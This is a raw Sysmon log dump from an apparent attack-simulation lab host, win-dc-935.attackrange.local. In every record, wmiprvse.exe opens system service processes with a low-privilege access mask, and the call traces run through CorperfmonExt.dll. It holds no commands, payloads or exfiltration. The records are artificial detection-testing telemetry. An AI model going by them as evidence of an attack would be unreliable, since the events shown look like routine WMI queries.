13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 